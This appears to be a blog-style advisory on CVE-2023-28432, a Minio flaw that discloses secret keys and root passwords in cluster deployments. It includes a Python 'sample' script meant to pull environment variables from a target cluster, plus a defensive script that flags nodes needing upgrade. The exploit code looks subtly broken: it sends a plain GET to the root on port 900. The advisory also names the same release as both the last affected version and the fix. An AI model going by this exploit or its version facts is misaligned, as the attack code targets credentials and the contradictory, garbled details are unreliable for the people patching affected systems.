Minio is a widely used Multi-Cloud Object Storage Framework that lets users store, manage, and access data across different cloud environments. A critical security vulnerability, designated CVE-2023-28432, has recently been identified in Minio. It exposes sensitive information, including critical access credentials such as MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. Users of a cluster deployment environment with versions starting from RELEASE.2019-12-17T23-16-33Z to RELEASE.2023-03-20T20-16-18Z are affected. All users are strongly recommended to upgrade to the patched version, RELEASE.2023-03-20T20-16-18Z, to mitigate the risk associated with this vulnerability.

Here is a sample of code illustrating the issue:

import re
import requests

# Matches "NAME: value" pairs in the response body; this is how the sample
# picks environment variables out of the disclosed text.
ENV_PATTERN = re.compile(r'(\w+:\s+\w+)')

def get_env(url):
    # Fetch the response body from the affected Minio cluster endpoint.
    response = requests.get(url, timeout=10)
    # Extract every "NAME: value" pair from the returned text.
    return ENV_PATTERN.findall(response.text)

if __name__ == "__main__":
    # Placeholder kept from the original; replace with the cluster URL under test.
    minio_cluster_url = "http://your_minio_cluster_url:900"
    env_variables = get_env(minio_cluster_url)

    print("Extracted Environment Variables:")
    for env in env_variables:
        print(env)

Running this code against an affected Minio cluster deployment prints a list of environment variables, including sensitive values such as the secret key and root password.

Original References

- Minio GitHub Repository: Source code and documentation for the Minio Multi-Cloud Object Storage Framework.
- CVE-2023-28432 National Vulnerability Database (NVD) Entry: The official entry for this vulnerability in the NVD, managed by NIST.

Exploit Details

The vulnerability stems from the fact that affected versions of Minio return all environment variables, including sensitive ones such as MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, that should never be disclosed. This information disclosure can lead to unauthorized access, with potentially severe consequences for the affected system and its data.

All users of distributed deployment environments are affected by this issue. They should therefore upgrade to the latest version, RELEASE.2023-03-20T20-16-18Z, to resolve this vulnerability and eliminate the risk.

To upgrade your Minio cluster and resolve this issue, follow the official documentation on how to upgrade a Minio cluster deployment.
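Before upgrading, an operator usually wants to know which nodes in an inventory still run an affected release. The following is an added example (not code from the original post or from the Minio project) that parses Minio's RELEASE.YYYY-MM-DDTHH-MM-SSZ tags, treats releases from the first affected tag up to but not including the patched tag as vulnerable (an assumption about how the range above is meant), and only flags distributed deployments, as the advisory scopes the issue to cluster deployments. The host names and tags in the sample inventory are constructed.

```python
import re
from datetime import datetime
from typing import Dict, List

# Taken from the advisory text above: first affected release and the patched release.
FIRST_AFFECTED = "RELEASE.2019-12-17T23-16-33Z"
PATCHED = "RELEASE.2023-03-20T20-16-18Z"

# Minio release tags are UTC timestamps, so parsing them as datetimes gives release order.
_RELEASE_RE = re.compile(r"^RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z$")


def is_release_tag(tag: str) -> bool:
    """Return True if the string has the RELEASE.<UTC timestamp>Z shape."""
    return _RELEASE_RE.match(tag.strip()) is not None


def parse_release(tag: str) -> datetime:
    """Convert a release tag such as RELEASE.2023-03-20T20-16-18Z into a datetime."""
    m = _RELEASE_RE.match(tag.strip())
    if not m:
        raise ValueError(f"not a Minio release tag: {tag!r}")
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S")


def is_vulnerable(tag: str, distributed: bool = True) -> bool:
    """True if the release lies in [FIRST_AFFECTED, PATCHED) and runs as a cluster.

    Assumption: the advisory's range is read as inclusive of the first affected tag and
    exclusive of the patched tag; non-distributed deployments are not flagged.
    """
    if not distributed:
        return False
    release = parse_release(tag)
    return parse_release(FIRST_AFFECTED) <= release < parse_release(PATCHED)


def nodes_needing_upgrade(inventory: Dict[str, str], distributed: bool = True) -> List[str]:
    """Return the hosts (host -> release tag) that should be upgraded to PATCHED."""
    return sorted(host for host, tag in inventory.items() if is_vulnerable(tag, distributed))


# Constructed sample inventory (hypothetical hosts and tags), not real deployment data.
SAMPLE_INVENTORY = {
    "minio-1.example.internal": "RELEASE.2023-03-01T00-00-00Z",
    "minio-2.example.internal": "RELEASE.2023-03-20T20-16-18Z",
    "minio-3.example.internal": "RELEASE.2022-10-01T00-00-00Z",
}

if __name__ == "__main__":
    print("Nodes needing upgrade:", nodes_needing_upgrade(SAMPLE_INVENTORY))
```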

Conclusion

CVE-2023-28432 is a critical security vulnerability in the Minio Multi-Cloud Object Storage Framework. Users with an affected cluster deployment should upgrade to the patched release RELEASE.2023-03-20T20-16-18Z as soon as possible to prevent unauthorized access and data breaches. By following the latest security advisories and keeping their systems updated, users can protect themselves against this vulnerability and maintain the security of their data.

Timeline

Published on: 03/22/2023 21:15:00 UTC
Last modified on: 03/28/2023 16:26:00 UTC